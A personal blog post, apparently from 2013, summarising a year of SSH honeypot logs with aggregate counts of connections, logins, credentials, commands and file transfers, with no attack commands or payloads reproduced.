So I’ve been running a Secure shell honeypot for about a year or so, so might as well open up the log files and see what people have been l33ting these days.
For the uninitiated, or for normal people, Secure shell (or SSH) is the traditional method that people log in remotely to Linux (or other unix-based) servers.
A honeypot pretends to be a standard login server, but instead of logging into a real server, it allows would-be hackers to fairly easily guess their way into a sandbox environment, where they can be prodded and observed to see what they get up to.
The honeypot reacts like a normal server would, logging any input that it receives, and pretends to do the sorts of things that people normally try to do when they gain unauthorised access to a computer system (i.e. the electronic equivalent of putting graffiti in the toilet stalls and having their way with the photocopier).
And now, what with Julia Gillard declaring a new War on Technology and throwing money at a new “cyber security centre” (which will certainly be money well spent), it should be every citizen’s prerogative to try to see what the evil commies are getting up to on their computer networks.
So after pretty much a full day of number-crunching and regexing the 2012 logfiles, and a second full day of fiddling about with databases and wordpress, this is what I’ve got:
|Total number of connections:||143,039|
|Total number of unique IP addresses:||1,488|
|Total number of logins:||179,671|
|Total number of unique usernames:||18,413|
|Total number of unique passwords:||38,010|
|Total number of unique username/passwords combinations:||78,568|
|Total session time:||65 days, 7 minutes, 51 hours, 29 seconds|
|(minimum session time):||0 seconds|
|(average session time):||39.5 seconds|
|(maximum session time):||2 days, 13 minutes, 35 hours, 27 seconds|
|Total number of interactive commands:||394|
|Total number of non-interactive commands:||59|
|Total number of file transfers:||11|
Network intrustion statistics
Long sessions are graphed at 1:00:00
If you’re interested in the files people are downloading, the ones I’m seeing (with server names redacted to stop you from inadvertently clicking on the things):
which also includes a microsoft windows service pack in there, amusingly enough.
I would check out these
.tgz archives to see what’s in there, but hey… only so many hours in the day.
And it’s always amusing to see the sorts of usernames/passwords that people attempt to jiggle the locks with, so:
Top 20 Login credentials
Top 20 IP addresses
|Korea, Republic of||5183||3.623%|
If I had even a shred of business nouse I’d throw that all into a webapp or bundle it into a programmable network appliance and get people to pay me, oh, $200 a pop for it. Leave a message in the comment sections below if you’re interested, incidentally.
Not that you can actually do that much with the information, but I guess it’s always nice to know what people are trying to do with random IP addresses out on the internet.
Especially if it’s your random IP addresses out on the internet.
Update 30/1/2013: Added the bit about cacutza in the password section.
Update 6/5/2013: If you find this interesting, you might also want to look at another kippo analysis at http://blog.macuyiko.com/2011/03/running-ssh-honeypot-with-kippo-lets.html .
Really interesting. You should take a look in those files! I’m curious. haha.tgz… gosh.jpg … they are downloading to your honeypot then down to thier own servers from there?